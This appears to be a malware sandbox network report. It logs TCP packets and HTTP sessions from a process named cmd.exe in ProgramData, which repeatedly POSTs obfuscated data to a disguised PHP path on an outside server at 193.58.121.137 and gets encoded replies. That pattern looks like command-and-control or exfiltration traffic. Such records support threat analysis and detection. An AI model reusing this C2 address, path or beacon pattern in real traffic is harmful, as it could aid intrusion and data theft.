                                                                                                                                  Jan 3, 2025 20:48:55.951208115 CET5009380192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:55.959898949 CET5009380192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:55.964677095 CET8050093193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:56.185509920 CET5009280192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:56.191066980 CET8050092193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:56.192908049 CET8050092193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:56.311072111 CET5009380192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:56.316236019 CET8050093193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:56.316248894 CET8050093193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:56.316257954 CET8050093193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:56.489723921 CET8050092193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:56.544657946 CET5009280192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:56.598861933 CET8050093193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:56.653983116 CET5009380192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:56.726963043 CET8050093193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:56.778934956 CET5009380192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:56.854576111 CET5009380192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:56.854576111 CET5009280192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:56.854973078 CET5009480192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:56.861030102 CET8050093193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:56.861371040 CET8050092193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:56.861433983 CET8050094193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:56.861435890 CET5009380192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:56.861459017 CET5009280192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:56.861496925 CET5009480192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:56.861624002 CET5009480192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:56.867816925 CET8050094193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:57.217320919 CET5009480192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:57.223144054 CET8050094193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:57.223159075 CET8050094193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:57.223170042 CET8050094193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:57.530221939 CET8050094193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:57.575792074 CET5009480192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:57.666150093 CET8050094193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:57.716464996 CET5009480192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:57.943352938 CET5009580192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:57.948234081 CET8050095193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:57.948295116 CET5009580192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:57.950536013 CET5009580192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:57.955310106 CET8050095193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:58.295054913 CET5009580192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:58.300148010 CET8050095193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:58.300162077 CET8050095193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:58.300173998 CET8050095193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:58.687091112 CET8050095193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:58.732059956 CET5009580192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:58.807468891 CET5009580192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:58.807696104 CET5009680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:58.812551975 CET8050096193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:58.812686920 CET8050095193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:58.812747955 CET5009680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:58.812786102 CET5009580192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:58.812931061 CET5009680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:58.817749977 CET8050096193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:59.170186996 CET5009680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:59.175184011 CET8050096193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:59.175200939 CET8050096193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:59.175211906 CET8050096193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:59.436980009 CET8050096193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:59.482089996 CET5009680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:59.568761110 CET8050096193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:59.622692108 CET5009680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:59.709427118 CET5009780192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:59.709490061 CET5009680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:59.714302063 CET8050097193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:59.714477062 CET5009780192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:59.714607954 CET5009780192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:59.715358019 CET8050096193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:48:59.715423107 CET5009680192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:48:59.719424009 CET8050097193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:00.060363054 CET5009780192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:00.065252066 CET8050097193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:00.065264940 CET8050097193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:00.065275908 CET8050097193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:00.383277893 CET8050097193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:00.435225010 CET5009780192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:00.524929047 CET8050097193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:00.575977087 CET5009780192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:01.566756964 CET5009880192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:01.566935062 CET5009780192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:01.571624041 CET8050098193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:01.571695089 CET5009880192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:01.571885109 CET8050097193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:01.571947098 CET5009780192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:01.572736025 CET5009880192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:01.577507973 CET8050098193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:01.608611107 CET5009980192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:01.608661890 CET5009880192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:01.613409042 CET8050099193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:01.613467932 CET5009980192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:01.613631964 CET5009980192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:01.620116949 CET8050099193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:01.653688908 CET8050098193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:01.966613054 CET5009980192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:01.971497059 CET8050099193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:01.971510887 CET8050099193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:01.971523046 CET8050099193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:02.059207916 CET8050098193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:02.060175896 CET5009880192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:02.322532892 CET8050099193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:02.372730970 CET5009980192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:02.453272104 CET8050099193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:02.497716904 CET5009980192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:02.542020082 CET8050094193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:02.543029070 CET5009480192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:02.572698116 CET5009480192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:02.574352026 CET5009980192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:02.574709892 CET5010080192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:02.579451084 CET8050099193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:02.579545975 CET5009980192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:02.579565048 CET8050100193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:02.579667091 CET5010080192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:02.579777956 CET5010080192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:02.584587097 CET8050100193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:02.935344934 CET5010080192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:02.940359116 CET8050100193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:02.940373898 CET8050100193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:02.940385103 CET8050100193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:03.218236923 CET8050100193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:03.263361931 CET5010080192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:03.348541021 CET8050100193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:03.403973103 CET5010080192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:03.463542938 CET5010180192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:03.468544960 CET8050101193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:03.468641043 CET5010180192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:03.468750000 CET5010180192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:03.473582029 CET8050101193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:03.826119900 CET5010180192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:03.831118107 CET8050101193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:03.831134081 CET8050101193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:03.831146002 CET8050101193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:04.189882994 CET8050101193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:04.247710943 CET5010180192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:04.324601889 CET8050101193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:04.372721910 CET5010180192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:08.228152037 CET8050100193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:08.228207111 CET5010080192.168.2.4193.58.121.137
                                                                                                                                  Jan 3, 2025 20:49:09.291805983 CET8050101193.58.121.137192.168.2.4
                                                                                                                                  Jan 3, 2025 20:49:09.292018890 CET5010180192.168.2.4193.58.121.137
                                                                                                                                  • 193.58.121.137
                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.449736193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:39.219044924 CET396OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 344
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:47:39.576263905 CET344OUTData Raw: 00 05 01 01 06 0d 04 05 05 06 02 01 02 0d 01 00 00 0b 05 0c 02 04 03 00 00 03 0d 0d 05 06 01 00 0a 05 03 0f 00 00 04 04 0e 07 04 05 00 06 04 06 03 03 0c 00 0d 04 07 06 06 01 05 03 04 07 04 0f 00 53 0d 0e 07 54 01 06 0f 0f 0f 01 0d 51 0b 05 04 07
                                                                                                                                  Data Ascii: STQ]QTT\L}U|s~tLquu^|e`U||kXl|[opX}sStItiO~V@xCP}rW
                                                                                                                                  Jan 3, 2025 20:47:39.859349966 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:39.900854111 CET1236INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:39 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Length: 1352
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 56 4a 7e 4c 7b 43 7b 49 6c 72 5a 49 7f 62 63 07 7d 59 5d 41 68 63 69 0a 79 5d 7f 5f 69 61 63 5a 77 60 7e 51 6d 07 65 4b 76 75 7f 59 7e 4b 78 01 55 4b 71 0a 74 71 63 02 7c 62 75 06 7f 59 50 0b 7b 48 70 0b 6a 63 74 5d 76 62 61 4c 60 58 75 02 7f 4f 5b 5b 7d 6c 56 41 6a 77 7b 49 76 76 7b 06 7c 5b 7d 01 7d 70 62 59 6f 59 5d 5e 78 77 6b 59 79 7e 67 05 7a 04 70 03 6f 73 72 4e 68 60 6b 5b 6c 5e 73 5a 6a 04 67 05 62 72 64 02 7a 51 41 5b 6b 01 63 55 7d 71 65 40 76 6f 7c 07 7b 42 7c 03 63 60 50 43 7b 72 71 47 6a 6c 50 4c 6f 5f 5b 5a 76 4d 74 5f 75 71 64 02 63 5f 76 50 7e 5d 79 5f 77 5b 7d 01 76 65 68 09 68 42 65 00 77 7c 70 04 7e 73 6c 07 6f 6f 7c 5a 7a 63 76 01 7c 6d 7c 08 76 64 7c 05 69 62 66 09 6a 0b 73 0d 6f 53 71 5f 7f 61 65 07 7b 5d 46 51 7c 6c 7f 55 7e 06 7b 55 7d 49 5c 00 6c 53 63 06 7b 04 68 46 7c 72 77 44 7e 5e 7c 52 6b 70 76 55 6e 5d 6f 58 7d 4c 6c 02 60 4d 69 51 7b 5c 79 06 76 76 56 01 7d 66 5a 04 7d 76 75 0a 77 62 73 06 7d 62 65 42 7f 59 66 0d 79 66 70 40 7c 63 7f 04 76 4c 7d 4f 77 71 7d 00 7e 71 [TRUNCATED]
                                                                                                                                  Data Ascii: VJ~L{C{IlrZIbc}Y]Ahciy]_iacZw`~QmeKvuY~KxUKqtqc|buYP{Hpjct]vbaL`XuO[[}lVAjw{Ivv{|[}}pbYoY]^xwkYy~gzposrNh`k[l^sZjgbrdzQA[kcU}qe@vo|{B|c`PC{rqGjlPLo_[ZvMt_uqdc_vP~]y_w[}vehhBew|p~sloo|Zzcv|m|vd|ibfjsoSq_ae{]FQ|lU~{U}I\lSc{hF|rwD~^|RkpvUn]oX}Ll`MiQ{\yvvV}fZ}vuwbs}beBYfyfp@|cvL}Owq}~qPlp~YQKvqYJzbq|`a{YtNxYxMxCkzrdFxc~|`ZI{Y|I~\vqVG~Bc|YtA}aWu||N{Rhw^rz_WG~BT{_~wcgu_lw_zCpTvbmLv[|lut|p|cpIx|wx`P}}^ww^A~bT@}m]B{}f}La`t|BtC`x|gfLz}{{L|Hac~Y|pqOyMl~rlvceOzOiDvvVH~vxM}v[OwbbeB|gX{flA}]gIuLuta_qbF}ltwQKwqUIxr[}^_Dyw`xIhxSwzLRFxc~O{]NZltcZjbRZuXxH}Ro|^`kmAbw^zl|vsfA{au}BT_z\y\}b`g{ZL~Jx^T`[uMwu^hb_t|^|shDll`YlYb}moTw^`NbrOzSYQQurjaQYwK{QNP~Nx|wbLxmYJl\d|bg|dgOhNyy`hjrVwMayaiZw\B[igASu@c^FjzYQkeUUhQ|^{t\iu_}I|LI|^P|px]bbGW~n^RcUoUS`pR]SOwkW}D{]NZlcEPqNbYEk|^h]NP\}qSZQAsk[}K}\CYie@VrKbZF`Zc[OS_}Acqm\wXswfkyFpU]YS{@RoRBWXJhn]I[yiaTzSYQaTa
                                                                                                                                  Jan 3, 2025 20:47:39.900871992 CET345INData Raw: 05 79 70 5c 41 51 59 42 51 7e 7b 73 57 6a 63 08 4f 51 7b 61 5a 54 6e 07 55 6f 04 08 00 53 5b 60 4a 56 66 78 4e 6b 73 65 51 7b 5e 73 63 65 4f 7c 42 70 5a 54 54 56 06 72 40 5c 65 55 42 51 5e 08 5d 52 01 6e 4d 5d 7e 78 06 66 5b 76 41 68 60 7a 0f 7f
                                                                                                                                  Data Ascii: yp\AQYBQ~{sWjcOQ{aZTnUoS[`JVfxNkseQ{^sceO|BpZTTVr@\eUBQ^]RnM]~xf[vAh`z^oMRo`\buzb]r~km~X|{WjdDZ}d^TaVjFRtUAldgZme||\t{]NZlcEPqNbYEkxDP]cHPXbL\}^WodXv]}vV~R{qtWbeHY`x[q\B_caORsKcT@`APU\]okYx]VZx|wG{NvJ@pJp^
                                                                                                                                  Jan 3, 2025 20:47:40.121293068 CET345INData Raw: 05 79 70 5c 41 51 59 42 51 7e 7b 73 57 6a 63 08 4f 51 7b 61 5a 54 6e 07 55 6f 04 08 00 53 5b 60 4a 56 66 78 4e 6b 73 65 51 7b 5e 73 63 65 4f 7c 42 70 5a 54 54 56 06 72 40 5c 65 55 42 51 5e 08 5d 52 01 6e 4d 5d 7e 78 06 66 5b 76 41 68 60 7a 0f 7f
                                                                                                                                  Data Ascii: yp\AQYBQ~{sWjcOQ{aZTnUoS[`JVfxNkseQ{^sceO|BpZTTVr@\eUBQ^]RnM]~xf[vAh`z^oMRo`\buzb]r~km~X|{WjdDZ}d^TaVjFRtUAldgZme||\t{]NZlcEPqNbYEkxDP]cHPXbL\}^WodXv]}vV~R{qtWbeHY`x[q\B_caORsKcT@`APU\]okYx]VZx|wG{NvJ@pJp^
                                                                                                                                  Jan 3, 2025 20:47:40.168848038 CET372OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 380
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:47:40.363717079 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:40.363887072 CET380OUTData Raw: 5f 52 5c 58 59 47 5a 52 5a 5c 55 51 59 5e 54 57 56 51 5d 42 50 52 5a 5d 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _R\XYGZRZ\UQY^TWVQ]BPRZ]Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%@< '_'X)2*2,]((?B*$>6*U3^,%#'0('_!%Y)7
                                                                                                                                  Jan 3, 2025 20:47:40.558882952 CET324INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:40 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Length: 152
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 09 1e 26 1c 27 1f 38 53 27 3b 28 09 25 39 31 0e 3c 3c 02 1d 3a 1f 0e 5a 22 2a 2f 56 3d 33 2f 02 3e 3c 3c 11 21 2f 04 56 35 01 21 11 2b 2a 23 5b 03 1d 22 59 22 21 2e 5e 25 29 2a 01 2c 20 3c 44 25 3d 3d 59 28 58 29 52 23 10 35 0c 23 2d 20 52 3b 30 39 5a 26 2f 2c 06 28 3e 3d 05 33 3f 21 51 00 10 39 12 30 33 22 04 25 2c 3e 12 31 04 26 00 30 36 3b 5b 22 2f 3a 50 26 06 21 5e 2f 21 2b 0c 31 0c 2c 50 36 20 3c 18 3e 07 21 1e 32 01 22 5f 2a 01 20 52 00 31 5c 51
                                                                                                                                  Data Ascii: &'8S';(%91<<:Z"*/V=3/><<!/V5!+*#["Y"!.^%)*, <D%==Y(X)R#5#- R;09Z&/,(>=3?!Q903"%,>1&06;["/:P&!^/!+1,P6 <>!2"_* R1\Q
                                                                                                                                  Jan 3, 2025 20:47:40.559545040 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:47:40.873181105 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:40.903309107 CET2560OUTData Raw: 5a 55 5c 5e 5c 47 5a 57 5a 5c 55 51 59 5b 54 51 56 5e 5d 48 50 50 5a 5b 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZU\^\GZWZ\UQY[TQV^]HPPZ[Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%) 0X)2')[1Z+<8(4!%>R*3+Y9%=\ Q8('_!%Y)3
                                                                                                                                  Jan 3, 2025 20:47:41.187624931 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:40 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V
                                                                                                                                  Jan 3, 2025 20:47:41.187889099 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 1440
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:47:41.411417961 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:41.414933920 CET1440OUTData Raw: 5f 53 59 5e 5c 44 5a 57 5a 5c 55 51 59 59 54 55 56 5f 5d 41 50 56 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _SY^\DZWZ\UQYYTUV_]APVZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&+30'-"2%1++<<$%2T( 3^,&!X4Q'R+='_!%Y)
                                                                                                                                  Jan 3, 2025 20:47:41.739913940 CET324INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:41 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Length: 152
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 09 1e 25 06 25 26 2f 09 27 06 3c 0a 27 04 0b 0f 28 05 23 09 2d 08 2c 13 36 03 3b 56 29 20 38 13 29 3f 20 13 36 3c 29 0c 22 2f 2e 06 2a 2a 23 5b 03 1d 22 5f 21 22 31 06 25 29 03 5a 38 0e 0e 42 26 3d 0f 5f 2b 2e 07 53 23 07 21 0a 22 00 30 55 2f 55 3e 02 26 2c 3f 5e 29 3d 08 13 30 15 21 51 00 10 3a 09 24 1d 1b 5c 33 3c 0c 5b 32 13 39 11 27 25 27 5a 21 12 2e 53 25 01 3a 01 2f 0b 3c 56 26 32 0a 53 36 33 06 16 2a 29 0f 1c 32 11 22 5f 2a 01 20 52 00 31 5c 51
                                                                                                                                  Data Ascii: %%&/'<'(#-,6;V) 8)? 6<)"/.**#["_!"1%)Z8B&=_+.S#!"0U/U>&,?^)=0!Q:$\3<[29'%'Z!.S%:/<V&2S63*)2"_* R1\Q


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  1192.168.2.449737193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:40.329499960 CET372OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 384
                                                                                                                                  Expect: 100-continue
